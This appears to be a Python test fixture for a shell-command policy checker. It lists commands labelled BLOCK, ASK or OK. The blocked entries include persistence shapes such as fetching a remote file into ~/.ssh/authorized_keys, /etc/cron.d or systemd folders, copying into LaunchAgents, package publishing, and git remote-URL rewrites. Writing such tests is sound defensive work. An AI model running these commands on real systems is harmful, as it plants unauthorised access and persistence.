"""block-persistence-shapes: forms found in the independent verification round, refused and the correct twin allowed."""

BLOCK, ASK, OK = 1, 3, 0

CASES: dict[str, list[tuple[str, int]]] = {
    "block-persistence-shapes": [
        # review round 4: a cluster, a target folder, a glued -m, a workspace named like a verb, git config urls
        ("curl -sSLo ~/.ssh/authorized_keys https://x.example/k", BLOCK),
        ("curl -fsSLo/etc/cron.d/x https://x.example/k", BLOCK),
        ("wget -qO ~/.ssh/authorized_keys https://x.example/k", BLOCK),
        ("wget -qO/etc/cron.d/x https://x.example/k", BLOCK),
        ("wget -qP ~/.config/systemd/user https://x.example/a.service", BLOCK),
        ("curl -sSLo out.txt https://x.example/k", OK),
        ("curl -sSLO https://x.example/k", OK),
        ("wget -qO- https://x.example/k", OK),
        ("wget -qO out.txt https://x.example/k", OK),
        ("cp -t ~/.config/systemd/user x.service", BLOCK),
        ("cp -vt /etc/cron.d x", BLOCK),
        ("cp -t/etc/cron.d x", BLOCK),
        ("cp --target-directory /etc/cron.d x", BLOCK),
        ("install -Dt /etc/cron.d x", BLOCK),
        ("mv -t ~/Library/LaunchAgents x.plist", BLOCK),
        ("ln -st /etc/cron.d x", BLOCK),
        ("cp -t ~/.ssh authorized_keys", BLOCK),
        ("cp -t ~/.ssh id_x.pub", OK),
        ("cp -t /tmp x", OK),
        ("cp -r src dst", OK),
        ("python -mtwine upload dist/*", BLOCK),
        ("py -m twine upload dist/*", BLOCK),
        ("python -m twine.cli upload dist/*", BLOCK),
        ("python -mpip install x", OK),
        ("py -m pytest", OK),
        ("python -m", OK),
        ("python -m twine", OK),
        ("yarn workspace test publish", BLOCK),
        ("yarn workspace build publish --access public", BLOCK),
        ("yarn workspace app publish", BLOCK),
        ("yarn workspace test build", OK),
        ("yarn workspace", OK),
        ("git config remote.origin.url https://x.example/r.git", ASK),
        ("git config --global remote.origin.pushurl git@x.example:o/r.git", ASK),
        ("git config url.https://x.example/.insteadOf https://github.com/", ASK),
        ("git config --get remote.origin.url", OK),
        ("git config remote.origin.url", OK),
        ("git config --unset remote.origin.pushurl", OK),
        ("git config core.editor vim", OK),
        ("chmod u-x+s a", BLOCK),
        ("chmod u-s a", OK),
        ("chmod u=rwx,g=rx a", OK),
    ],
}
